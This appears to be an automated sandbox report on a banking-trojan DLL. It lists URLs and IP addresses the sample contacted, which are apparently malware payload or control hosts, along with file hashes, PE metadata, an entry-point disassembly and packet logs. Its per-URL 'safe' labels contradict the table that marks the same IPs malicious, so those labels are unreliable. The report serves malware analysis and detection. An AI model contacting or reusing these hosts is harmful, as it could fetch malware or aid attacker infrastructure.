                        https://45.77.0.96/Arundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/derloaddll32.exe, 00000000.00000003.508139529.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/xrundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/.140.214:808/loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/l9rundll32.exe, 00000003.00000003.781390646.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/zrundll32.exe, 00000003.00000003.675255963.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://183.244.140.214:808/loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/qrundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/aenh.dllurundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/l0rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/l/rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/hrundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/aenh.dllusZrundll32.exe, 00000003.00000003.599520556.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/lloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.77.0.96
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue
                        185.56.219.47
                        		unknownItaly
                        		202675KELIWEBITtrue
                        192.46.210.220
                        		unknownUnited States
                        		5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                        143.244.140.214
                        		unknownUnited States
                        		174COGENT-174UStrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:510689
                        Start date:28.10.2021
                        Start time:04:55:56
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Variant.Razy.980776.8232.19927 (renamed file extension from 19927 to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.bank.troj.evad.winDLL@11/0@0/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 13.7% (good quality ratio 13.7%)
                        • Quality average: 78.8%
                        • Quality standard deviation: 15.9%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.50.102.62, 23.211.4.86, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 23.203.70.208, 40.112.88.60, 51.11.168.232, 20.190.160.4, 20.190.160.134, 20.190.160.8, 20.190.160.136, 20.190.160.132, 20.190.160.69, 20.190.160.73, 20.190.160.71, 20.49.150.241, 51.104.136.2
                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:57:58API Interceptor180x Sleep call for process: rundll32.exe modified
                        04:58:01API Interceptor181x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        45.77.0.96SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                185.56.219.47SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        KELIWEBITSecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        No created / dropped files found

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.439735798494042
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:SecuriteInfo.com.Variant.Razy.980776.8232.dll
                                                                                                        File size:1375232
                                                                                                        MD5:6df0687582c592e9860683a68858e082
                                                                                                        SHA1:53780def0699c055381746ce4ecebef8f17fd12d
                                                                                                        SHA256:90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
                                                                                                        SHA512:43c27e2af87306bd6389af980e50dffc2b219868881db1a026d56eef7b012f94d11426cf82338901c7e950b463e1e7a8e8f0f7563040a3b5c013b4a39906a376
                                                                                                        SSDEEP:24576:anxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7i:acfk82uAJTI7EPswKwuG
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:...~...~...~.....8.z...w.X._...,...z...,...l...,...c...,...[.....<.f...~.......,.......,.......,.3.....,.......Rich~..........

                                                                                                        File Icon

                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4336b0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x5BBD73BC [Wed Oct 10 03:36:28 2018 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007F0A74999C37h
                                                                                                        call 00007F0A7499A967h
                                                                                                        mov eax, dword ptr [ebp+10h]
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        push ecx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        push edx
                                                                                                        call 00007F0A74999A26h
                                                                                                        add esp, 0Ch
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        push edx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        xor edx, dword ptr [0054806Ch]
                                                                                                        push edx
                                                                                                        call 00007F0A74999C74h
                                                                                                        add esp, 08h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        mov eax, 00000020h
                                                                                                        sub eax, edx
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+08h]
                                                                                                        push ecx
                                                                                                        call 00007F0A74999C43h
                                                                                                        add esp, 08h
                                                                                                        xor eax, dword ptr [0054806Ch]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        ror eax, cl
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007F0A7499AFCDh
                                                                                                        push eax
                                                                                                        call 00007F0A749DBCD7h
                                                                                                        add esp, 04h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000xc5e2f0xc6000False0.442065922901data6.47813133498IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0xc70000x80aec0x80c00False0.534103837985data5.52051601648IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        Bluewing10x49eed0
                                                                                                        Earth20x49efd0
                                                                                                        Masterjust30x49eb20

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 28, 2021 04:57:57.951545954 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:57.951613903 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:57.951729059 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:57.977791071 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:57.977837086 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:58.507962942 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:58.508114100 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:58.848462105 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:58.848484993 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:58.848769903 CEST44349747192.46.210.220192.168.2.6
